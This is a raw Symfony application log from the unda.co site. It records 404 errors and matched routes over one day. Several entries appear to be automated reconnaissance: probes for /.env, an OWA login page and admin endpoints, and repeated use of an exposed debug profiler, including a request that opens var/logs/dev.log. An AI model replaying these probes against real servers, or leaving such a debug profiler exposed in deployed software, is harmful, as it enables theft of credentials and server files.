[2025-12-17 10:02:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dashboard"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dashboard\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /admin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /admin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /account"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /account\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /settings"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /settings\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/user"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/user\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /submit"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /submit\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/auth/logon.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/auth/logon.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:03:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21","method":"GET"} []
[2025-12-17 10:03:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 10:05:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=time","method":"GET"} []
[2025-12-17 10:05:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 10:12:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=request","method":"GET"} []
[2025-12-17 10:12:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 10:18:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=config","method":"GET"} []
[2025-12-17 10:18:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 10:32:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 10:32:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 10:39:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0a83b4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0a83b4","method":"GET"} []
[2025-12-17 10:39:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 10:43:57] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"622f73","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/622f73/search/results?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
[2025-12-17 10:43:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
[2025-12-17 10:45:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee3c72","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee3c72?panel=twig","method":"GET"} []
[2025-12-17 10:45:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 10:49:43] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 10:54:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=twig","method":"GET"} []
[2025-12-17 10:54:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 10:57:08] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 11:06:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"577b2c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/577b2c?panel=events","method":"GET"} []
[2025-12-17 11:06:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-17 11:19:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 11:28:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=36.72.159.194&limit=10&method=GET","method":"GET"} []
[2025-12-17 11:28:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=36.72.159.194&limit=10&method=GET","method":"GET"} []
[2025-12-17 11:28:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"27f092","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/27f092?panel=form","method":"GET"} []
[2025-12-17 11:28:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-17 11:35:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3af495","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3af495?panel=twig","method":"GET"} []
[2025-12-17 11:35:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 11:36:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=db","method":"GET"} []
[2025-12-17 11:36:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-17 11:42:48] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 11:55:25] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0ae0c0","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0ae0c0/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-17 11:55:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-17 11:59:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c116bf","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c116bf?panel=form","method":"GET"} []
[2025-12-17 11:59:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-17 12:19:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a70ed4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a70ed4","method":"GET"} []
[2025-12-17 12:19:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 12:19:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
[2025-12-17 12:19:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-17 12:19:45] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-17 12:19:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-17 12:24:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=109.199.118.129&limit=10","method":"GET"} []
[2025-12-17 12:24:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=109.199.118.129&limit=10","method":"GET"} []
[2025-12-17 12:29:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9ce7d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b9ce7d?panel=logger","method":"GET"} []
[2025-12-17 12:29:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-17 12:30:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 12:37:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 12:37:47] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-17 12:59:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=exception","method":"GET"} []
[2025-12-17 12:59:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-17 13:10:09] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=var%2Flogs%2Fdev.log&line=0","method":"GET"} []
[2025-12-17 13:13:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 13:16:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=exception","method":"GET"} []
[2025-12-17 13:16:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-17 13:26:33] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 13:30:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=cache","method":"GET"} []
[2025-12-17 13:30:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 13:31:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=34.223.102.8&limit=10&method=GET","method":"GET"} []
[2025-12-17 13:31:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=34.223.102.8&limit=10&method=GET","method":"GET"} []
[2025-12-17 13:32:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ab2g"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ab2g\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 13:32:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ab2h"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ab2h\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 13:32:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 13:32:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 13:32:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /teorema505"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /teorema505\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 13:48:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47","method":"GET"} []
[2025-12-17 13:48:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 13:53:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 13:59:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8f4430","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8f4430?panel=validator","method":"GET"} []
[2025-12-17 13:59:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-17 13:59:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=twig","method":"GET"} []
[2025-12-17 13:59:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 14:11:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a96757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a96757?panel=time","method":"GET"} []
[2025-12-17 14:11:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 14:21:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=config","method":"GET"} []
[2025-12-17 14:21:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 14:30:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568","method":"GET"} []
[2025-12-17 14:30:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
